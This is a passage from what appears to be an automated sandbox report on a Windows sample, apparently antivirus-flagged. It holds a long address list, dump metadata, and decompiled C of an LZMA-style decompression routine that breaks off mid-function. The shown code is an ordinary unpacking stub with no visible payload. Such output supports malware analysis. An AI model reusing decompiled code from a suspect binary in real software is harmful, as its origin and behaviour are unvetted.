                                                                                                                          0x00406f97
                                                                                                                          0x00406f9a
                                                                                                                          0x00406f9a
                                                                                                                          0x00406fa0
                                                                                                                          0x00406f3e
                                                                                                                          0x00406f3e
                                                                                                                          0x00406f41
                                                                                                                          0x00000000
                                                                                                                          0x00406f41
                                                                                                                          0x00406fa2
                                                                                                                          0x00406fa2
                                                                                                                          0x00406fa5
                                                                                                                          0x00406fa8
                                                                                                                          0x00406fab
                                                                                                                          0x00406fae
                                                                                                                          0x00406fb1
                                                                                                                          0x00406fb4
                                                                                                                          0x00406fb7
                                                                                                                          0x00406fba
                                                                                                                          0x00406fbd
                                                                                                                          0x00406fc0
                                                                                                                          0x00406fd8
                                                                                                                          0x00406fdb
                                                                                                                          0x00406fde
                                                                                                                          0x00406fe1
                                                                                                                          0x00406fe1
                                                                                                                          0x00406fe4
                                                                                                                          0x00406fe8
                                                                                                                          0x00406fea
                                                                                                                          0x00406fc2
                                                                                                                          0x00406fc2
                                                                                                                          0x00406fca
                                                                                                                          0x00406fcf
                                                                                                                          0x00406fd1
                                                                                                                          0x00406fd3
                                                                                                                          0x00406fd3
                                                                                                                          0x00406fed
                                                                                                                          0x00406ff4
                                                                                                                          0x00406ff7
                                                                                                                          0x00000000
                                                                                                                          0x00406ff9
                                                                                                                          0x00000000
                                                                                                                          0x00406ff9
                                                                                                                          0x00000000
                                                                                                                          0x00407286
                                                                                                                          0x00407286
                                                                                                                          0x0040728a
                                                                                                                          0x004075b1
                                                                                                                          0x00000000
                                                                                                                          0x004075b1
                                                                                                                          0x00407290
                                                                                                                          0x00407293
                                                                                                                          0x00407296
                                                                                                                          0x0040729a
                                                                                                                          0x0040729d
                                                                                                                          0x004072a3
                                                                                                                          0x004072a5
                                                                                                                          0x004072a5
                                                                                                                          0x004072a5
                                                                                                                          0x004072a8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407056
                                                                                                                          0x00407056
                                                                                                                          0x00407059
                                                                                                                          0x004073cb
                                                                                                                          0x004073cb
                                                                                                                          0x004073cb
                                                                                                                          0x00000000
                                                                                                                          0x004073cb
                                                                                                                          0x00000000
                                                                                                                          0x00407395
                                                                                                                          0x00407399
                                                                                                                          0x004073bb
                                                                                                                          0x004073be
                                                                                                                          0x004073c8
                                                                                                                          0x004073cb
                                                                                                                          0x004073cb
                                                                                                                          0x004073cb
                                                                                                                          0x00000000
                                                                                                                          0x004073cb
                                                                                                                          0x004073cb
                                                                                                                          0x0040739b
                                                                                                                          0x0040739e
                                                                                                                          0x004073a2
                                                                                                                          0x004073a5
                                                                                                                          0x004073a5
                                                                                                                          0x004073a8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407452
                                                                                                                          0x00407456
                                                                                                                          0x00407474
                                                                                                                          0x00407474
                                                                                                                          0x00407474
                                                                                                                          0x0040747b
                                                                                                                          0x00407482
                                                                                                                          0x00407489
                                                                                                                          0x00407489
                                                                                                                          0x00000000
                                                                                                                          0x00407489
                                                                                                                          0x00407458
                                                                                                                          0x0040745b
                                                                                                                          0x0040745e
                                                                                                                          0x00407461
                                                                                                                          0x00407468
                                                                                                                          0x004073ac
                                                                                                                          0x004073ac
                                                                                                                          0x004073af
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407543
                                                                                                                          0x00407546
                                                                                                                          0x00407447
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040717d
                                                                                                                          0x0040717f
                                                                                                                          0x00407186
                                                                                                                          0x00407187
                                                                                                                          0x00407189
                                                                                                                          0x0040718c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407194
                                                                                                                          0x00407197
                                                                                                                          0x0040719a
                                                                                                                          0x0040719c
                                                                                                                          0x0040719e
                                                                                                                          0x0040719e
                                                                                                                          0x0040719f
                                                                                                                          0x004071a2
                                                                                                                          0x004071a9
                                                                                                                          0x004071ac
                                                                                                                          0x004071ba
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407490
                                                                                                                          0x00407490
                                                                                                                          0x00407493
                                                                                                                          0x0040749a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040749f
                                                                                                                          0x0040749f
                                                                                                                          0x004074a3
                                                                                                                          0x004075db
                                                                                                                          0x00000000
                                                                                                                          0x004075db
                                                                                                                          0x004074a9
                                                                                                                          0x004074ac
                                                                                                                          0x004074af
                                                                                                                          0x004074b3
                                                                                                                          0x004074b6
                                                                                                                          0x004074bc
                                                                                                                          0x004074be
                                                                                                                          0x004074be
                                                                                                                          0x004074be
                                                                                                                          0x004074c1
                                                                                                                          0x004074c4
                                                                                                                          0x004074c4
                                                                                                                          0x004074c4
                                                                                                                          0x004074c4
                                                                                                                          0x004074c7
                                                                                                                          0x004074c7
                                                                                                                          0x004074cb
                                                                                                                          0x0040752b
                                                                                                                          0x0040752e
                                                                                                                          0x00407533
                                                                                                                          0x00407534
                                                                                                                          0x00407536
                                                                                                                          0x00407538
                                                                                                                          0x0040753b
                                                                                                                          0x00407447
                                                                                                                          0x00407447
                                                                                                                          0x00000000
                                                                                                                          0x0040744d
                                                                                                                          0x00407447
                                                                                                                          0x004074cd
                                                                                                                          0x004074d3
                                                                                                                          0x004074d6
                                                                                                                          0x004074d9
                                                                                                                          0x004074dc
                                                                                                                          0x004074df
                                                                                                                          0x004074e2
                                                                                                                          0x004074e5
                                                                                                                          0x004074e8
                                                                                                                          0x004074eb
                                                                                                                          0x004074ee
                                                                                                                          0x00407507
                                                                                                                          0x0040750a
                                                                                                                          0x0040750d
                                                                                                                          0x00407510
                                                                                                                          0x00407514
                                                                                                                          0x00407516
                                                                                                                          0x00407516
                                                                                                                          0x00407517
                                                                                                                          0x0040751a
                                                                                                                          0x004074f0
                                                                                                                          0x004074f0
                                                                                                                          0x004074f8
                                                                                                                          0x004074fd
                                                                                                                          0x004074ff
                                                                                                                          0x00407502
                                                                                                                          0x00407502
                                                                                                                          0x0040751d
                                                                                                                          0x00407524
                                                                                                                          0x00000000
                                                                                                                          0x00407526
                                                                                                                          0x00000000
                                                                                                                          0x00407526
                                                                                                                          0x00000000
                                                                                                                          0x004071c2
                                                                                                                          0x004071c5
                                                                                                                          0x004071fb
                                                                                                                          0x0040732b
                                                                                                                          0x0040732b
                                                                                                                          0x0040732b
                                                                                                                          0x0040732b
                                                                                                                          0x0040732e
                                                                                                                          0x0040732e
                                                                                                                          0x00407331
                                                                                                                          0x00407333
                                                                                                                          0x004075bd
                                                                                                                          0x00000000
                                                                                                                          0x004075bd
                                                                                                                          0x00407339
                                                                                                                          0x0040733c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407342
                                                                                                                          0x00407346
                                                                                                                          0x00407349
                                                                                                                          0x00407349
                                                                                                                          0x00407349
                                                                                                                          0x00000000
                                                                                                                          0x00407349
                                                                                                                          0x004071c7
                                                                                                                          0x004071c9
                                                                                                                          0x004071cb
                                                                                                                          0x004071cd
                                                                                                                          0x004071d0
                                                                                                                          0x004071d1
                                                                                                                          0x004071d3
                                                                                                                          0x004071d5
                                                                                                                          0x004071d8
                                                                                                                          0x004071db
                                                                                                                          0x004071f1
                                                                                                                          0x004071f6
                                                                                                                          0x0040722e
                                                                                                                          0x0040722e
                                                                                                                          0x00407232
                                                                                                                          0x0040725e
                                                                                                                          0x00407260
                                                                                                                          0x00407267
                                                                                                                          0x0040726a
                                                                                                                          0x0040726d
                                                                                                                          0x0040726d
                                                                                                                          0x00407272
                                                                                                                          0x00407272
                                                                                                                          0x00407274
                                                                                                                          0x00407277
                                                                                                                          0x0040727e
                                                                                                                          0x00407281
                                                                                                                          0x004072ae
                                                                                                                          0x004072ae
                                                                                                                          0x004072b1
                                                                                                                          0x004072b4
                                                                                                                          0x00407328
                                                                                                                          0x00407328
                                                                                                                          0x00407328
                                                                                                                          0x00000000
                                                                                                                          0x00407328
                                                                                                                          0x004072b6
                                                                                                                          0x004072bc
                                                                                                                          0x004072bf
                                                                                                                          0x004072c2
                                                                                                                          0x004072c5
                                                                                                                          0x004072c8
                                                                                                                          0x004072cb
                                                                                                                          0x004072ce
                                                                                                                          0x004072d1
                                                                                                                          0x004072d4
                                                                                                                          0x004072d7
                                                                                                                          0x004072f0
                                                                                                                          0x004072f2
                                                                                                                          0x004072f5
                                                                                                                          0x004072f6
                                                                                                                          0x004072f9
                                                                                                                          0x004072fb
                                                                                                                          0x004072fe
                                                                                                                          0x00407300
                                                                                                                          0x00407302
                                                                                                                          0x00407305
                                                                                                                          0x00407307
                                                                                                                          0x0040730a
                                                                                                                          0x0040730e
                                                                                                                          0x00407310
                                                                                                                          0x00407310
                                                                                                                          0x00407311
                                                                                                                          0x00407314
                                                                                                                          0x00407317
                                                                                                                          0x004072d9
                                                                                                                          0x004072d9
                                                                                                                          0x004072e1
                                                                                                                          0x004072e6
                                                                                                                          0x004072e8
                                                                                                                          0x004072eb
                                                                                                                          0x004072eb
                                                                                                                          0x0040731a
                                                                                                                          0x00407321
                                                                                                                          0x004072ab
                                                                                                                          0x004072ab
                                                                                                                          0x004072ab
                                                                                                                          0x004072ab
                                                                                                                          0x00000000
                                                                                                                          0x00407323
                                                                                                                          0x00000000
                                                                                                                          0x00407323
                                                                                                                          0x00407321
                                                                                                                          0x00407234
                                                                                                                          0x00407237
                                                                                                                          0x00407239
                                                                                                                          0x0040723c
                                                                                                                          0x0040723f
                                                                                                                          0x00407242
                                                                                                                          0x00407244
                                                                                                                          0x00407247
                                                                                                                          0x0040724a
                                                                                                                          0x0040724a
                                                                                                                          0x0040724d
                                                                                                                          0x0040724d
                                                                                                                          0x00407250
                                                                                                                          0x00407257
                                                                                                                          0x0040722b
                                                                                                                          0x0040722b
                                                                                                                          0x0040722b
                                                                                                                          0x0040722b
                                                                                                                          0x00000000
                                                                                                                          0x00407259
                                                                                                                          0x00000000
                                                                                                                          0x00407259
                                                                                                                          0x00407257
                                                                                                                          0x004071dd
                                                                                                                          0x004071e0
                                                                                                                          0x004071e2
                                                                                                                          0x004071e5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406f44
                                                                                                                          0x00406f44
                                                                                                                          0x00406f48
                                                                                                                          0x0040758d
                                                                                                                          0x00000000
                                                                                                                          0x0040758d
                                                                                                                          0x00406f4e
                                                                                                                          0x00406f51
                                                                                                                          0x00406f54
                                                                                                                          0x00406f57
                                                                                                                          0x00406f5a
                                                                                                                          0x00406f5d
                                                                                                                          0x00406f60
                                                                                                                          0x00406f62
                                                                                                                          0x00406f65
                                                                                                                          0x00406f68
                                                                                                                          0x00406f6b
                                                                                                                          0x00406f6d
                                                                                                                          0x00406f6d
                                                                                                                          0x00406f6d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004070cf
                                                                                                                          0x004070cf
                                                                                                                          0x004070d3
                                                                                                                          0x00407599
                                                                                                                          0x00000000
                                                                                                                          0x00407599
                                                                                                                          0x004070d9
                                                                                                                          0x004070dc
                                                                                                                          0x004070df
                                                                                                                          0x004070e2
                                                                                                                          0x004070e4
                                                                                                                          0x004070e4
                                                                                                                          0x004070e4
                                                                                                                          0x004070e7
                                                                                                                          0x004070ea
                                                                                                                          0x004070ed
                                                                                                                          0x004070f0
                                                                                                                          0x004070f3
                                                                                                                          0x004070f6
                                                                                                                          0x004070f7
                                                                                                                          0x004070f9
                                                                                                                          0x004070f9
                                                                                                                          0x004070f9
                                                                                                                          0x004070fc
                                                                                                                          0x004070ff
                                                                                                                          0x00407102
                                                                                                                          0x00407105
                                                                                                                          0x00407105
                                                                                                                          0x00407105
                                                                                                                          0x00407108
                                                                                                                          0x0040710a
                                                                                                                          0x0040710a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040734c
                                                                                                                          0x0040734c
                                                                                                                          0x0040734c
                                                                                                                          0x00407350
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407356
                                                                                                                          0x00407359
                                                                                                                          0x0040735c
                                                                                                                          0x0040735f
                                                                                                                          0x00407361
                                                                                                                          0x00407361
                                                                                                                          0x00407361
                                                                                                                          0x00407364
                                                                                                                          0x00407367
                                                                                                                          0x0040736a
                                                                                                                          0x0040736d
                                                                                                                          0x00407370
                                                                                                                          0x00407373
                                                                                                                          0x00407374
                                                                                                                          0x00407376
                                                                                                                          0x00407376
                                                                                                                          0x00407376
                                                                                                                          0x00407379
                                                                                                                          0x0040737c
                                                                                                                          0x0040737f
                                                                                                                          0x00407382
                                                                                                                          0x00407385
                                                                                                                          0x00407389
                                                                                                                          0x0040738b
                                                                                                                          0x0040738e
                                                                                                                          0x00000000
                                                                                                                          0x00407390
                                                                                                                          0x0040710d
                                                                                                                          0x0040710d
                                                                                                                          0x00000000
                                                                                                                          0x0040710d
                                                                                                                          0x0040738e
                                                                                                                          0x004075c3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406bf2
                                                                                                                          0x004075fa
                                                                                                                          0x004075fa
                                                                                                                          0x00000000
                                                                                                                          0x004075fa
                                                                                                                          0x00407447
                                                                                                                          0x004073ce
                                                                                                                          0x004073cb
                                                                                                                          0x00000000
                                                                                                                          0x00407002

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                                                          • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                                                                                          • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                                                          • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E0040711C() {
                                                                                                                          				unsigned short _t531;
                                                                                                                          				signed int _t532;
                                                                                                                          				void _t533;
                                                                                                                          				signed int _t534;
                                                                                                                          				signed int _t535;
                                                                                                                          				signed int _t565;
                                                                                                                          				signed int _t568;
                                                                                                                          				signed int _t589;
                                                                                                                          				signed int* _t606;
                                                                                                                          				void* _t613;
                                                                                                                          
                                                                                                                          				L0:
                                                                                                                          				while(1) {
                                                                                                                          					L0:
                                                                                                                          					if( *(_t613 - 0x40) != 0) {
                                                                                                                          						 *(_t613 - 0x84) = 0xb;
                                                                                                                          						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                                                                                          						goto L132;
                                                                                                                          					} else {
                                                                                                                          						__eax =  *(__ebp - 0x28);
                                                                                                                          						L88:
                                                                                                                          						 *(__ebp - 0x2c) = __eax;
                                                                                                                          						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                          						L89:
                                                                                                                          						__eax =  *(__ebp - 4);
                                                                                                                          						 *(__ebp - 0x80) = 0x15;
                                                                                                                          						__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                          						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                          						L69:
                                                                                                                          						 *(__ebp - 0x84) = 0x12;
                                                                                                                          						while(1) {
                                                                                                                          							L132:
                                                                                                                          							 *(_t613 - 0x54) = _t606;
                                                                                                                          							while(1) {
                                                                                                                          								L133:
                                                                                                                          								_t531 =  *_t606;
                                                                                                                          								_t589 = _t531 & 0x0000ffff;
                                                                                                                          								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                          								if( *(_t613 - 0xc) >= _t565) {
                                                                                                                          									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                          									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                          									 *(_t613 - 0x40) = 1;
                                                                                                                          									_t532 = _t531 - (_t531 >> 5);
                                                                                                                          									 *_t606 = _t532;
                                                                                                                          								} else {
                                                                                                                          									 *(_t613 - 0x10) = _t565;
                                                                                                                          									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                          									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                          								}
                                                                                                                          								if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                          									goto L139;
                                                                                                                          								}
                                                                                                                          								L137:
                                                                                                                          								if( *(_t613 - 0x6c) == 0) {
                                                                                                                          									 *(_t613 - 0x88) = 5;
                                                                                                                          									L170:
                                                                                                                          									_t568 = 0x22;
                                                                                                                          									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                          									_t535 = 0;
                                                                                                                          									L172:
                                                                                                                          									return _t535;
                                                                                                                          								}
                                                                                                                          								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                          								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                          								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                          								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                          								L139:
                                                                                                                          								_t533 =  *(_t613 - 0x84);
                                                                                                                          								while(1) {
                                                                                                                          									 *(_t613 - 0x88) = _t533;
                                                                                                                          									while(1) {
                                                                                                                          										L1:
                                                                                                                          										_t534 =  *(_t613 - 0x88);
                                                                                                                          										if(_t534 > 0x1c) {
                                                                                                                          											break;
                                                                                                                          										}
                                                                                                                          										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                                                                          											case 0:
                                                                                                                          												if( *(_t613 - 0x6c) == 0) {
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                          												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                          												_t534 =  *( *(_t613 - 0x70));
                                                                                                                          												if(_t534 > 0xe1) {
                                                                                                                          													goto L171;
                                                                                                                          												}
                                                                                                                          												_t538 = _t534 & 0x000000ff;
                                                                                                                          												_push(0x2d);
                                                                                                                          												asm("cdq");
                                                                                                                          												_pop(_t570);
                                                                                                                          												_push(9);
                                                                                                                          												_pop(_t571);
                                                                                                                          												_t609 = _t538 / _t570;
                                                                                                                          												_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                          												asm("cdq");
                                                                                                                          												_t604 = _t540 % _t571 & 0x000000ff;
                                                                                                                          												 *(_t613 - 0x3c) = _t604;
                                                                                                                          												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                          												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                          												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                          												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                          													L10:
                                                                                                                          													if(_t612 == 0) {
                                                                                                                          														L12:
                                                                                                                          														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                          														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                          														goto L15;
                                                                                                                          													} else {
                                                                                                                          														goto L11;
                                                                                                                          													}
                                                                                                                          													do {
                                                                                                                          														L11:
                                                                                                                          														_t612 = _t612 - 1;
                                                                                                                          														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                          													} while (_t612 != 0);
                                                                                                                          													goto L12;
                                                                                                                          												}
                                                                                                                          												if( *(_t613 - 4) != 0) {
                                                                                                                          													GlobalFree( *(_t613 - 4));
                                                                                                                          												}
                                                                                                                          												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                          												 *(_t613 - 4) = _t534;
                                                                                                                          												if(_t534 == 0) {
                                                                                                                          													goto L171;
                                                                                                                          												} else {
                                                                                                                          													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                          													goto L10;
                                                                                                                          												}
                                                                                                                          											case 1:
                                                                                                                          												L13:
                                                                                                                          												__eflags =  *(_t613 - 0x6c);
                                                                                                                          												if( *(_t613 - 0x6c) == 0) {
                                                                                                                          													 *(_t613 - 0x88) = 1;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                          												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                          												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                          												_t45 = _t613 - 0x48;
                                                                                                                          												 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                          												__eflags =  *_t45;
                                                                                                                          												L15:
                                                                                                                          												if( *(_t613 - 0x48) < 4) {
                                                                                                                          													goto L13;
                                                                                                                          												}
                                                                                                                          												_t546 =  *(_t613 - 0x40);
                                                                                                                          												if(_t546 ==  *(_t613 - 0x74)) {
                                                                                                                          													L20:
                                                                                                                          													 *(_t613 - 0x48) = 5;
                                                                                                                          													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                          													goto L23;
                                                                                                                          												}
                                                                                                                          												 *(_t613 - 0x74) = _t546;
                                                                                                                          												if( *(_t613 - 8) != 0) {
                                                                                                                          													GlobalFree( *(_t613 - 8));
                                                                                                                          												}
                                                                                                                          												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                          												 *(_t613 - 8) = _t534;
                                                                                                                          												if(_t534 == 0) {
                                                                                                                          													goto L171;
                                                                                                                          												} else {
                                                                                                                          													goto L20;
                                                                                                                          												}
                                                                                                                          											case 2:
                                                                                                                          												L24:
                                                                                                                          												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                          												 *(_t613 - 0x84) = 6;
                                                                                                                          												 *(_t613 - 0x4c) = _t553;
                                                                                                                          												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                                                          												L132:
                                                                                                                          												 *(_t613 - 0x54) = _t606;
                                                                                                                          												goto L133;
                                                                                                                          											case 3:
                                                                                                                          												L21:
                                                                                                                          												__eflags =  *(_t613 - 0x6c);
                                                                                                                          												if( *(_t613 - 0x6c) == 0) {
                                                                                                                          													 *(_t613 - 0x88) = 3;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                          												_t67 = _t613 - 0x70;
                                                                                                                          												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                          												__eflags =  *_t67;
                                                                                                                          												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                          												L23:
                                                                                                                          												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                          												if( *(_t613 - 0x48) != 0) {
                                                                                                                          													goto L21;
                                                                                                                          												}
                                                                                                                          												goto L24;
                                                                                                                          											case 4:
                                                                                                                          												L133:
                                                                                                                          												_t531 =  *_t606;
                                                                                                                          												_t589 = _t531 & 0x0000ffff;
                                                                                                                          												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                          												if( *(_t613 - 0xc) >= _t565) {
                                                                                                                          													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                          													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                          													 *(_t613 - 0x40) = 1;
                                                                                                                          													_t532 = _t531 - (_t531 >> 5);
                                                                                                                          													 *_t606 = _t532;
                                                                                                                          												} else {
                                                                                                                          													 *(_t613 - 0x10) = _t565;
                                                                                                                          													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                          													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                          												}
                                                                                                                          												if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                          													goto L139;
                                                                                                                          												}
                                                                                                                          											case 5:
                                                                                                                          												goto L137;
                                                                                                                          											case 6:
                                                                                                                          												__edx = 0;
                                                                                                                          												__eflags =  *(__ebp - 0x40);
                                                                                                                          												if( *(__ebp - 0x40) != 0) {
                                                                                                                          													__eax =  *(__ebp - 4);
                                                                                                                          													__ecx =  *(__ebp - 0x38);
                                                                                                                          													 *(__ebp - 0x34) = 1;
                                                                                                                          													 *(__ebp - 0x84) = 7;
                                                                                                                          													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                          													while(1) {
                                                                                                                          														L132:
                                                                                                                          														 *(_t613 - 0x54) = _t606;
                                                                                                                          														goto L133;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                          												__esi =  *(__ebp - 0x60);
                                                                                                                          												__cl = 8;
                                                                                                                          												__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                          												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                          												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                          												__ecx =  *(__ebp - 0x3c);
                                                                                                                          												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                          												__ecx =  *(__ebp - 4);
                                                                                                                          												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                          												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                          												__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                          												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                          												if( *(__ebp - 0x38) >= 4) {
                                                                                                                          													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                          													if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                          														_t98 = __ebp - 0x38;
                                                                                                                          														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                          														__eflags =  *_t98;
                                                                                                                          													} else {
                                                                                                                          														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                          													}
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x38) = 0;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                          												if( *(__ebp - 0x34) == __edx) {
                                                                                                                          													__ebx = 0;
                                                                                                                          													__ebx = 1;
                                                                                                                          													goto L61;
                                                                                                                          												} else {
                                                                                                                          													__eax =  *(__ebp - 0x14);
                                                                                                                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          														__eflags = __eax;
                                                                                                                          													}
                                                                                                                          													__ecx =  *(__ebp - 8);
                                                                                                                          													__ebx = 0;
                                                                                                                          													__ebx = 1;
                                                                                                                          													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
